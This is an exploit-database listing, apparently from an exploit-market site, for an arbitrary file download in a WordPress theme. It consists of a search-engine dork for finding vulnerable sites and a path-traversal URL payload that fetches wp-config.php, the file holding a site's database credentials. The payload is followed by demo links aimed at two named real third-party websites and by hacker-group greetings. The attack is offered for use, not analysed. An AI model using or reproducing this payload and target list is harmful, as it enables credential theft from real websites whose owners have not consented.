[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress core theme Arbitrary File Download Vulnerability

Author
Rh-S334
Risk
[
Security Risk High
]
0day-ID
0day-ID-22630
Category
web applications
Date add
12-09-2014
Platform
php
# Exploit Title: WordPress core theme Arbitrary File Download Vulnerability
# Date: 2014/09/11
# Google Dork : inurl:/wp-content/themes/core/framework/wordpress-importer/
# Exploit Author: ABdéllah El Maghribi
# Tested on: Windows 7,8 & Linux
#Download Config From The Target.
POC :

http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  
Demo :
   http://helpingboysthrive.org/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.basewellness.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

=====================
Greetz :
  
Moulay MrTheMaroc | VUr!s003 | XHAck-Vur!s | Yunus El MAghribi | The-Ghost-X-Killer | And All Friends
  
[!] Moroccan Agent Secret Team - Moroccan HAX0r [!]

#  0day.today [2024-11-15]  #